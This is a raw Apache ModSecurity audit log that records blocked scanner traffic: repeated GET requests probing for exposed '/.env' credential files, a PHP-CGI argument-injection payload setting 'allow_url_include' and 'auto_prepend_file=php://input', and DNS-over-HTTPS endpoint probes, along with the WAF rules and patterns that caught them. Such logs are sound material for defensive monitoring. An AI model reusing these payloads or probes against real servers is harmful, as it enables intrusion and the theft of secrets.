Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0bce174f-Z-- --76372507-A-- [30/Apr/2025:06:59:37 +0700] aBFn6dmPDA_SdVd56wDv5QAAAM8 103.236.140.4 33564 103.236.140.4 8181 --76372507-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0; NCE-AL00 Build/HUAWEINCE-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044813 Mobile Safari/537.36 MMWEBID/6904 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/4G Language/zh_CN Accept-Charset: utf-8 --76372507-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76372507-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745971177484070 13479 (- - -) Stopwatch2: 1745971177484070 13479; combined=25487, p1=351, p2=0, p3=0, p4=0, p5=12586, sr=120, sw=0, l=0, gc=12550 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76372507-Z-- --c9280108-A-- [30/Apr/2025:07:03:35 +0700] aBFo1zsHLQ2TK6eM3eo9rAAAAIE 103.236.140.4 34512 103.236.140.4 8181 --c9280108-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 OPR/62.0.3331.116 Accept-Charset: utf-8 --c9280108-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9280108-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745971415013816 754 (- - -) Stopwatch2: 1745971415013816 754; combined=313, p1=274, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9280108-Z-- --1072295b-A-- [30/Apr/2025:07:06:12 +0700] aBFpdDsHLQ2TK6eM3eo9zQAAAJA 103.236.140.4 35124 103.236.140.4 8181 --1072295b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.84 Safari/537.36 Accept-Charset: utf-8 --1072295b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1072295b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745971572043227 799 (- - -) Stopwatch2: 1745971572043227 799; combined=364, p1=326, p2=0, p3=0, p4=0, p5=38, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1072295b-Z-- --d9ed2059-A-- [30/Apr/2025:07:06:35 +0700] aBFpizsHLQ2TK6eM3eo9zwAAAI8 103.236.140.4 35214 103.236.140.4 8181 --d9ed2059-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 152.70.44.251 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 152.70.44.251 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --d9ed2059-C-- --d9ed2059-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9ed2059-E-- --d9ed2059-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745971595422577 4822 (- - -) Stopwatch2: 1745971595422577 4822; combined=3090, p1=502, p2=2554, p3=0, p4=0, p5=33, sr=75, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9ed2059-Z-- --2069bf69-A-- [30/Apr/2025:07:43:06 +0700] aBFyGtmPDA_SdVd56wDzGQAAAMk 103.236.140.4 43926 103.236.140.4 8181 --2069bf69-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 92.204.144.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 92.204.144.151 X-Forwarded-Proto: https Connection: close Accept: */* --2069bf69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2069bf69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745973786809253 740 (- - -) Stopwatch2: 1745973786809253 740; combined=286, p1=248, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2069bf69-Z-- --8e595e61-A-- [30/Apr/2025:09:28:29 +0700] aBGKzT1td-6YjlnYDRKQSAAAABU 103.236.140.4 36704 103.236.140.4 8181 --8e595e61-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.245.117.221 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.245.117.221 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --8e595e61-C-- Óexamplecom --8e595e61-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e595e61-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745980109175845 3026 (- - -) Stopwatch2: 1745980109175845 3026; combined=2053, p1=484, p2=1487, p3=23, p4=29, p5=30, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e595e61-Z-- --a026cc69-A-- [30/Apr/2025:09:28:29 +0700] aBGKzT1td-6YjlnYDRKQSwAAABc 103.236.140.4 36710 103.236.140.4 8181 --a026cc69-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.245.117.221 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.245.117.221 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --a026cc69-C-- ègexamplecom --a026cc69-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --a026cc69-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745980109230583 2757 (- - -) Stopwatch2: 1745980109230583 2757; combined=1870, p1=430, p2=1373, p3=20, p4=22, p5=25, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a026cc69-Z-- --0c22a274-A-- [30/Apr/2025:09:28:29 +0700] aBGKzTsHLQ2TK6eM3epLCAAAAJY 103.236.140.4 36720 103.236.140.4 8181 --0c22a274-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.245.117.221 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.245.117.221 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --0c22a274-C-- x—examplecom --0c22a274-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c22a274-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745980109284745 3439 (- - -) Stopwatch2: 1745980109284745 3439; combined=2268, p1=500, p2=1687, p3=23, p4=28, p5=29, sr=107, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c22a274-Z-- --47a1e844-A-- [30/Apr/2025:09:28:29 +0700] aBGKzT1td-6YjlnYDRKQTgAAABQ 103.236.140.4 36726 103.236.140.4 8181 --47a1e844-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.245.117.221 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.245.117.221 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --47a1e844-C-- ’fexamplecom --47a1e844-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --47a1e844-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745980109339285 2894 (- - -) Stopwatch2: 1745980109339285 2894; combined=2059, p1=400, p2=1592, p3=20, p4=22, p5=25, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47a1e844-Z-- --17eaa379-A-- [30/Apr/2025:09:28:29 +0700] aBGKzdBN0baiHx4WjiZpUAAAAEs 103.236.140.4 36744 103.236.140.4 8181 --17eaa379-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.245.117.221 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.245.117.221 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --17eaa379-C-- Ï&examplecom --17eaa379-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --17eaa379-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745980109608873 3760 (- - -) Stopwatch2: 1745980109608873 3760; combined=2651, p1=554, p2=1996, p3=28, p4=33, p5=40, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17eaa379-Z-- --51825134-A-- [30/Apr/2025:09:28:29 +0700] aBGKzdBN0baiHx4WjiZpUwAAAFE 103.236.140.4 36754 103.236.140.4 8181 --51825134-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.245.117.221 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.245.117.221 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --51825134-C-- Texamplecom --51825134-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --51825134-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745980109668016 3497 (- - -) Stopwatch2: 1745980109668016 3497; combined=2338, p1=527, p2=1729, p3=27, p4=29, p5=26, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51825134-Z-- --dd40077d-A-- [30/Apr/2025:09:28:29 +0700] aBGKzT1td-6YjlnYDRKQUgAAAAQ 103.236.140.4 36760 103.236.140.4 8181 --dd40077d-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.245.117.221 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.245.117.221 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --dd40077d-C-- ¸àexamplecom --dd40077d-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --dd40077d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745980109739613 3215 (- - -) Stopwatch2: 1745980109739613 3215; combined=1951, p1=416, p2=1458, p3=27, p4=24, p5=25, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd40077d-Z-- --9713c11e-A-- [30/Apr/2025:09:28:29 +0700] aBGKzT1td-6YjlnYDRKQVAAAAAs 103.236.140.4 36770 103.236.140.4 8181 --9713c11e-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.245.117.221 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.245.117.221 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --9713c11e-C-- óëexamplecom --9713c11e-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --9713c11e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745980109794636 3300 (- - -) Stopwatch2: 1745980109794636 3300; combined=1984, p1=420, p2=1476, p3=26, p4=24, p5=37, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9713c11e-Z-- --2e462749-A-- [30/Apr/2025:10:58:33 +0700] aBGf6dmPDA_SdVd56wAqHAAAAMw 103.236.140.4 60506 103.236.140.4 8181 --2e462749-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 139.59.132.8 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 139.59.132.8 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --2e462749-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e462749-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745985513501033 821 (- - -) Stopwatch2: 1745985513501033 821; combined=341, p1=302, p2=0, p3=0, p4=0, p5=39, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e462749-Z-- --2d37455b-A-- [30/Apr/2025:11:24:17 +0700] aBGl8TsHLQ2TK6eM3epy6QAAAII 103.236.140.4 43358 103.236.140.4 8181 --2d37455b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 137.184.203.63 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 137.184.203.63 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --2d37455b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d37455b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745987057115266 738 (- - -) Stopwatch2: 1745987057115266 738; combined=299, p1=265, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d37455b-Z-- --f0a2b24e-A-- [30/Apr/2025:12:23:44 +0700] aBGz4NmPDA_SdVd56wAw1wAAANI 103.236.140.4 57338 103.236.140.4 8181 --f0a2b24e-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 207.154.197.113 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 207.154.197.113 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --f0a2b24e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0a2b24e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745990624862716 769 (- - -) Stopwatch2: 1745990624862716 769; combined=299, p1=256, p2=0, p3=0, p4=0, p5=43, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0a2b24e-Z-- --7a585321-A-- [30/Apr/2025:13:19:12 +0700] aBHA4NBN0baiHx4WjiacMAAAAFQ 103.236.140.4 45506 103.236.140.4 8181 --7a585321-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 164.92.244.132 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 164.92.244.132 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --7a585321-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a585321-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745993952866305 915 (- - -) Stopwatch2: 1745993952866305 915; combined=408, p1=367, p2=0, p3=0, p4=0, p5=41, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a585321-Z-- --b3df0b7b-A-- [30/Apr/2025:13:33:28 +0700] aBHEODsHLQ2TK6eM3ep56wAAAIE 103.236.140.4 48862 103.236.140.4 8181 --b3df0b7b-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 139.59.143.102 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 139.59.143.102 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --b3df0b7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3df0b7b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745994808529697 832 (- - -) Stopwatch2: 1745994808529697 832; combined=298, p1=260, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3df0b7b-Z-- --f0e37a16-A-- [30/Apr/2025:13:44:00 +0700] aBHGsDsHLQ2TK6eM3ep6HAAAAIY 103.236.140.4 51316 103.236.140.4 8181 --f0e37a16-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (OS/2; Warp 4.5; rv:24.0) Gecko/20100101 Firefox/24.0 Accept-Charset: utf-8 --f0e37a16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0e37a16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745995440998331 757 (- - -) Stopwatch2: 1745995440998331 757; combined=303, p1=264, p2=0, p3=0, p4=0, p5=38, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
